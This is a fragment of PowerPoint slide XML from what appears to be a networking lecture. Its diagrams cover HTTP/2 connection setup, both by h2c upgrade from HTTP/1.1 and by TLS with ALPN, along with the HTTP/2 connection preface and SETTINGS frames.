          <p:cNvPr id="3" name="Slide Number Placeholder 2">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{18659509-2BF8-5E92-7E96-EFCAC67AD7F5}"/>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80</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="5" name="TextBox 4"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="766342" y="1847023"/>
            <a:ext cx="2094335"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sp>
        <p:nvSpPr>
          <p:cNvPr id="7" name="TextBox 6"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="9282589" y="1843867"/>
            <a:ext cx="2094335"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grpSp>
        <p:nvGrpSpPr>
          <p:cNvPr id="8" name="Group 7"/>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="3429231" y="2408591"/>
            <a:ext cx="5250715" cy="381708"/>
            <a:chOff x="3812374" y="3387776"/>
            <a:chExt cx="5250715" cy="381708"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:cxnSp>
          <p:nvCxnSpPr>
            <p:cNvPr id="9" name="Straight Arrow Connector 8"/>
            <p:cNvCxnSpPr/>
            <p:nvPr/>
          </p:nvCxnSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="3812374" y="3745695"/>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71877" y="3387776"/>
              <a:ext cx="3020122" cy="369332"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
            <a:noFill/>
          </p:spPr>
          <p:txBody>
            <a:bodyPr wrap="none" rtlCol="0">
              <a:spAutoFit/>
            </a:bodyPr>
            <a:lstStyle/>
            <a:p>
              <a:pPr algn="ctr"/>
              <a:r>
                <a:rPr lang="en-US" b="1" dirty="0"/>
                <a:t>GET /whatever.html HTTP/1.1</a:t>
              </a:r>
            </a:p>
          </p:txBody>
        </p:sp>
      </p:grpSp>
      <p:grpSp>
        <p:nvGrpSpPr>
          <p:cNvPr id="11" name="Group 10"/>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="3429231" y="2928403"/>
            <a:ext cx="5242791" cy="653217"/>
            <a:chOff x="3780935" y="3387776"/>
            <a:chExt cx="5242791" cy="653217"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:cxnSp>
          <p:nvCxnSpPr>
            <p:cNvPr id="12" name="Straight Arrow Connector 11"/>
            <p:cNvCxnSpPr/>
            <p:nvPr/>
          </p:nvCxnSpPr>
          <p:spPr>
            <a:xfrm flipH="1">
              <a:off x="3780935" y="4040993"/>
              <a:ext cx="5242791"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48830" y="3387776"/>
              <a:ext cx="1866217" cy="646331"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
            <a:noFill/>
          </p:spPr>
          <p:txBody>
            <a:bodyPr wrap="none" rtlCol="0">
              <a:spAutoFit/>
            </a:bodyPr>
            <a:lstStyle/>
            <a:p>
              <a:r>
                <a:rPr lang="en-US" b="1" dirty="0"/>
                <a:t>HTTP/1.1 200 OK</a:t>
              </a:r>
            </a:p>
            <a:p>
              <a:r>
                <a:rPr lang="en-US" b="1" dirty="0"/>
                <a:t>Upgrade: h2c</a:t>
              </a:r>
            </a:p>
          </p:txBody>
        </p:sp>
      </p:grpSp>
      <p:grpSp>
        <p:nvGrpSpPr>
          <p:cNvPr id="14" name="Group 13"/>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="3429231" y="4057316"/>
            <a:ext cx="5250715" cy="381708"/>
            <a:chOff x="3812375" y="3387776"/>
            <a:chExt cx="5250715" cy="381708"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:cxnSp>
          <p:nvCxnSpPr>
            <p:cNvPr id="15" name="Straight Arrow Connector 14"/>
            <p:cNvCxnSpPr/>
            <p:nvPr/>
          </p:nvCxnSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="3812375" y="3745695"/>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09041" y="3387776"/>
              <a:ext cx="3345789" cy="369332"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
            <a:noFill/>
          </p:spPr>
          <p:txBody>
            <a:bodyPr wrap="none" rtlCol="0">
              <a:spAutoFit/>
            </a:bodyPr>
            <a:lstStyle/>
            <a:p>
              <a:pPr algn="ctr"/>
              <a:r>
                <a:rPr lang="pt-BR" b="1" dirty="0"/>
                <a:t>PRI * HTTP/2.0\r\n\r\nSM\r\n\r\n</a:t>
              </a:r>
              <a:endParaRPr lang="en-US" b="1" dirty="0"/>
            </a:p>
          </p:txBody>
        </p:sp>
      </p:grpSp>
      <p:grpSp>
        <p:nvGrpSpPr>
          <p:cNvPr id="17" name="Group 16"/>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="3380547" y="5122057"/>
            <a:ext cx="5291475" cy="396408"/>
            <a:chOff x="3732253" y="3497352"/>
            <a:chExt cx="5291475" cy="216183"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:cxnSp>
          <p:nvCxnSpPr>
            <p:cNvPr id="18" name="Straight Arrow Connector 17"/>
            <p:cNvCxnSpPr/>
            <p:nvPr/>
          </p:nvCxnSpPr>
          <p:spPr>
            <a:xfrm flipH="1">
              <a:off x="3732253" y="3713535"/>
              <a:ext cx="5291475"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09333" y="3497352"/>
              <a:ext cx="1345240" cy="201416"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
            <a:noFill/>
          </p:spPr>
          <p:txBody>
            <a:bodyPr wrap="none" rtlCol="0">
              <a:spAutoFit/>
            </a:bodyPr>
            <a:lstStyle/>
            <a:p>
              <a:pPr algn="ctr"/>
              <a:r>
                <a:rPr lang="en-US" b="1" dirty="0"/>
                <a:t>SETTINGS…</a:t>
              </a:r>
            </a:p>
          </p:txBody>
        </p:sp>
      </p:gr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175" y="1570497"/>
            <a:ext cx="1005227" cy="10052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1768" y="1682278"/>
            <a:ext cx="893446" cy="893446"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="20" name="Rectangle 19">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{05B51C97-74E1-4FBB-AA3E-F8A20B2D7B1B}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5036486" y="2915935"/>
            <a:ext cx="1926857" cy="75980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F11B447-77AD-4558-33A3-41E104C0DF78}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="3429231" y="4551955"/>
            <a:ext cx="5250715" cy="381708"/>
            <a:chOff x="3812375" y="3387776"/>
            <a:chExt cx="5250715" cy="381708"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:cxnSp>
          <p:nvCxnSpPr>
            <p:cNvPr id="22" name="Straight Arrow Connector 21">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{DAFBCD69-A4F5-8EB6-F603-6A85D83E7948}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvCxnSpPr/>
            <p:nvPr/>
          </p:nvCxnSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="3812375" y="3745695"/>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91F348C-A779-3579-AABA-448CC644E765}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr txBox="1"/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="5678852" y="3387776"/>
              <a:ext cx="1406154" cy="369332"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
            <a:noFill/>
          </p:spPr>
          <p:txBody>
            <a:bodyPr wrap="none" rtlCol="0">
              <a:spAutoFit/>
            </a:bodyPr>
            <a:lstStyle/>
            <a:p>
              <a:pPr algn="ctr"/>
              <a:r>
                <a:rPr lang="en-US" b="1" dirty="0"/>
                <a:t>SETTINGS …</a:t>
              </a:r>
            </a:p>
          </p:txBody>
        </p:sp>
      </p:grpSp>
      <p:grpSp>
        <p:nvGrpSpPr>
          <p:cNvPr id="25" name="Group 24">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{E4C20A00-F8A5-DF30-A115-D1A30292DC29}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="3429231" y="5809874"/>
            <a:ext cx="5250715" cy="381708"/>
            <a:chOff x="3812375" y="3387776"/>
            <a:chExt cx="5250715" cy="381708"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:cxnSp>
          <p:nvCxnSpPr>
            <p:cNvPr id="26" name="Straight Arrow Connector 25">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{70FFEB03-246F-0166-8F8D-51969D2C0B65}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvCxnSpPr/>
            <p:nvPr/>
          </p:nvCxnSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="3812375" y="3745695"/>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1F924A3-94B2-DC01-C42E-E6F9CA40BBB2}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr txBox="1"/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="5685266" y="3387776"/>
              <a:ext cx="1393330" cy="369332"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
            <a:noFill/>
          </p:spPr>
          <p:txBody>
            <a:bodyPr wrap="none" rtlCol="0">
              <a:spAutoFit/>
            </a:bodyPr>
            <a:lstStyle/>
            <a:p>
              <a:pPr algn="ctr"/>
              <a:r>
                <a:rPr lang="en-US" b="1" dirty="0"/>
                <a:t>HEADERS …</a:t>
              </a:r>
            </a:p>
          </p:txBody>
        </p:sp>
      </p:grpSp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="28" name="TextBox 27">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{7210BC24-6766-5BE2-A37D-37F52F99442D}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="134445" y="2766743"/>
            <a:ext cx="2555457" cy="707886"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="457200" indent="-457200">
              <a:buFont typeface="+mj-lt"/>
              <a:buAutoNum type="arabicParenR"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0"/>
              <a:t>Request object via HTTP 1.1</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="29" name="TextBox 28">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{4D3D15EF-336E-2185-0653-C8FA78FC206C}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="8987769" y="3016689"/>
            <a:ext cx="2683973" cy="707886"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="457200" indent="-457200">
              <a:buFont typeface="+mj-lt"/>
              <a:buAutoNum type="arabicParenR" startAt="2"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0"/>
              <a:t>Respond and signal protocol upgrade</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="30" name="TextBox 29">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{B3C2C5CA-9B48-16D6-E75C-AC74A112AAF9}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="122175" y="4169208"/>
            <a:ext cx="2555457" cy="707886"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="457200" indent="-457200">
              <a:buFont typeface="+mj-lt"/>
              <a:buAutoNum type="arabicParenR" startAt="3"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0"/>
              <a:t>Initialize HTTP 2 connection</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="31" name="TextBox 30">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{6B9D61BF-148F-CA3A-43DE-C18A55A5FAE3}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="8987769" y="5006857"/>
            <a:ext cx="2555457" cy="707886"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="457200" indent="-457200">
              <a:buFont typeface="+mj-lt"/>
              <a:buAutoNum type="arabicParenR" startAt="4"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0"/>
              <a:t>Complete HTTP 2 connection setup</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="32" name="TextBox 31">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{26ADBFC6-9A06-DA0A-001A-0D1F541EAACF}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="122174" y="5825263"/>
            <a:ext cx="2555457" cy="707886"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="457200" indent="-457200">
              <a:buFont typeface="+mj-lt"/>
              <a:buAutoNum type="arabicParenR" startAt="5"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0"/>
              <a:t>Request object via HTTP 2</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="33" name="Rectangle 32">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{48C69F4D-F384-D36E-B764-F1B25EF585BA}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4281359" y="4012052"/>
            <a:ext cx="3458641" cy="51444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peech Bubble: Rectangle 33">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{638B65A0-E782-93F9-31C8-997CBBCCA336}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="9112311" y="3787869"/>
            <a:ext cx="2868224" cy="1077735"/>
          </a:xfrm>
          <a:prstGeom prst="wedgeRectCallout">
            <a:avLst>
              <a:gd name="adj1" fmla="val -94635"/>
              <a:gd name="adj2" fmla="val -1633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Designed to be </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0" err="1"/>
              <a:t>parseable</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0"/>
              <a:t> by an HTTP 1 server</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="82393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500"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="30"/>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p:stCondLst>
                              <p:cond delay="1500"/>
                            </p:stCondLst>
                            <p:childTnLst>
                              <p:par>
                                <p:cTn id="38" presetID="16" presetClass="entr" presetSubtype="21"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arn(inVertical)">
                                      <p:cBhvr>
                                        <p:cTn id="40" dur="500"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="33"/>
                                        </p:tgtEl>
                                      </p:cBhvr>
                                    </p:animEffect>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anim calcmode="lin" valueType="num">
                                      <p:cBhvr>
                                        <p:cTn id="45" dur="500" fill="hold"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="34"/>
                                        </p:tgtEl>
                                        <p:attrNameLst>
                                          <p:attrName>ppt_x</p:attrName>
                                        </p:attrNameLst>
                                      </p:cBhvr>
                                      <p:tavLst>
                                        <p:tav tm="0">
                                          <p:val>
                                            <p:strVal val="#ppt_x"/>
                                          </p:val>
                                        </p:tav>
                                        <p:tav tm="100000">
                                          <p:val>
                                            <p:strVal val="#ppt_x"/>
                                          </p:val>
                                        </p:tav>
                                      </p:tavLst>
                                    </p:anim>
                                    <p:anim calcmode="lin" valueType="num">
                                      <p:cBhvr>
                                        <p:cTn id="46"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up)">
                                      <p:cBhvr>
                                        <p:cTn id="51" dur="500"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="31"/>
                                        </p:tgtEl>
                                      </p:cBhvr>
                                    </p:animEffect>
                                  </p:childTnLst>
                                </p:cTn>
                              </p:par>
                            </p:childTnLst>
                          </p:cTn>
                        </p:par>
                        <p:par>
                          <p:cTn id="52" fill="hold">
                            <p:stCondLst>
                              <p:cond delay="500"/>
                            </p:stCondLst>
                            <p:childTnLst>
                              <p:par>
                                <p:cTn id="53" presetID="22" presetClass="entr" presetSubtype="2"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up)">
                                      <p:cBhvr>
                                        <p:cTn id="60" dur="500"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="32"/>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8" grpId="0"/>
      <p:bldP spid="29" grpId="0"/>
      <p:bldP spid="30" grpId="0"/>
      <p:bldP spid="31" grpId="0"/>
      <p:bldP spid="32" grpId="0"/>
      <p:bldP spid="33" grpId="0" animBg="1"/>
      <p:bldP spid="3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D576-9470-4EB1-6A43-10FBC25550E9}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>HTTPS Connection Establishment</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Slide Number Placeholder 2">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{18659509-2BF8-5E92-7E96-EFCAC67AD7F5}"/>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81</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="5" name="TextBox 4"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="766342" y="1847023"/>
            <a:ext cx="2094335"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sp>
        <p:nvSpPr>
          <p:cNvPr id="7" name="TextBox 6"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="9282589" y="1843867"/>
            <a:ext cx="2094335"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grpSp>
        <p:nvGrpSpPr>
          <p:cNvPr id="8" name="Group 7"/>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="3429231" y="2091791"/>
            <a:ext cx="5250715" cy="381708"/>
            <a:chOff x="3812374" y="3387776"/>
            <a:chExt cx="5250715" cy="381708"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:cxnSp>
          <p:nvCxnSpPr>
            <p:cNvPr id="9" name="Straight Arrow Connector 8"/>
            <p:cNvCxnSpPr/>
            <p:nvPr/>
          </p:nvCxnSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="3812374" y="3745695"/>
              <a:ext cx="5250715" cy="23789"/>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68630" y="3387776"/>
              <a:ext cx="1226619" cy="369332"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
            <a:noFill/>
          </p:spPr>
          <p:txBody>
            <a:bodyPr wrap="none" rtlCol="0">
              <a:spAutoFit/>
            </a:bodyPr>
            <a:lstStyle/>
            <a:p>
              <a:pPr algn="ctr"/>
              <a:r>
                <a:rPr lang="en-US" b="1" dirty="0" err="1"/>
                <a:t>ClientHello</a:t>
              </a:r>
              <a:endParaRPr lang="en-US" b="1" dirty="0"/>
            </a:p>
          </p:txBody>
        </p:sp>
      </p:grpSp>
      <p:grpSp>
        <p:nvGrpSpPr>
          <p:cNvPr id="11" name="Group 10"/>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="3429231" y="2597203"/>
            <a:ext cx="5242791" cy="646331"/>
            <a:chOff x="3780935" y="3416576"/>
            <a:chExt cx="5242791" cy="646331"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:cxnSp>
          <p:nvCxnSpPr>
            <p:cNvPr id="12" name="Straight Arrow Connector 11"/>
            <p:cNvCxnSpPr/>
            <p:nvPr/>
          </p:nvCxnSpPr>
          <p:spPr>
            <a:xfrm flipH="1">
              <a:off x="3780935" y="4040993"/>
              <a:ext cx="5242791"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48830" y="3416576"/>
              <a:ext cx="1281889" cy="646331"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
            <a:noFill/>
          </p:spPr>
          <p:txBody>
            <a:bodyPr wrap="none" rtlCol="0">
              <a:spAutoFit/>
            </a:bodyPr>
            <a:lstStyle/>
            <a:p>
              <a:r>
                <a:rPr lang="en-US" b="1" dirty="0" err="1"/>
                <a:t>ServerHello</a:t>
              </a:r>
              <a:endParaRPr lang="en-US" b="1" dirty="0"/>
            </a:p>
            <a:p>
              <a:r>
                <a:rPr lang="en-US" b="1" dirty="0"/>
                <a:t>ALPN: h2</a:t>
              </a:r>
            </a:p>
          </p:txBody>
        </p:sp>
      </p:grpSp>
      <p:grpSp>
        <p:nvGrpSpPr>
          <p:cNvPr id="14" name="Group 13"/>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="3429231" y="4460516"/>
            <a:ext cx="5250715" cy="381708"/>
            <a:chOff x="3812375" y="3387776"/>
            <a:chExt cx="5250715" cy="381708"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:cxnSp>
          <p:nvCxnSpPr>
            <p:cNvPr id="15" name="Straight Arrow Connector 14"/>
            <p:cNvCxnSpPr/>
            <p:nvPr/>
          </p:nvCxnSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="3812375" y="3745695"/>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09041" y="3387776"/>
              <a:ext cx="3345789" cy="369332"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
            <a:noFill/>
          </p:spPr>
          <p:txBody>
            <a:bodyPr wrap="none" rtlCol="0">
              <a:spAutoFit/>
            </a:bodyPr>
            <a:lstStyle/>
            <a:p>
              <a:pPr algn="ctr"/>
              <a:r>
                <a:rPr lang="pt-BR" b="1" dirty="0"/>
                <a:t>PRI * HTTP/2.0\r\n\r\nSM\r\n\r\n</a:t>
              </a:r>
              <a:endParaRPr lang="en-US" b="1" dirty="0"/>
            </a:p>
          </p:txBody>
        </p:sp>
      </p:grpSp>
      <p:grpSp>
        <p:nvGrpSpPr>
          <p:cNvPr id="17" name="Group 16"/>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="3380547" y="5525257"/>
            <a:ext cx="5291475" cy="396408"/>
            <a:chOff x="3732253" y="3497352"/>
            <a:chExt cx="5291475" cy="216183"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:cxnSp>
          <p:nvCxnSpPr>
            <p:cNvPr id="18" name="Straight Arrow Connector 17"/>
            <p:cNvCxnSpPr/>
            <p:nvPr/>
          </p:nvCxnSpPr>
          <p:spPr>
            <a:xfrm flipH="1">
              <a:off x="3732253" y="3713535"/>
              <a:ext cx="5291475"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09333" y="3497352"/>
              <a:ext cx="1345240" cy="201416"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
            <a:noFill/>
          </p:spPr>
          <p:txBody>
            <a:bodyPr wrap="none" rtlCol="0">
              <a:spAutoFit/>
            </a:bodyPr>
            <a:lstStyle/>
            <a:p>
              <a:pPr algn="ctr"/>
              <a:r>
                <a:rPr lang="en-US" b="1" dirty="0"/>
                <a:t>SETTINGS…</a:t>
              </a:r>
            </a:p>
          </p:txBody>
        </p:sp>
      </p:gr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175" y="1570497"/>
            <a:ext cx="1005227" cy="10052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1768" y="1682278"/>
            <a:ext cx="893446" cy="893446"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="20" name="Rectangle 19">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{05B51C97-74E1-4FBB-AA3E-F8A20B2D7B1B}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5036486" y="2563135"/>
            <a:ext cx="1926857" cy="75810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F11B447-77AD-4558-33A3-41E104C0DF78}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="3429231" y="4955155"/>
            <a:ext cx="5250715" cy="381708"/>
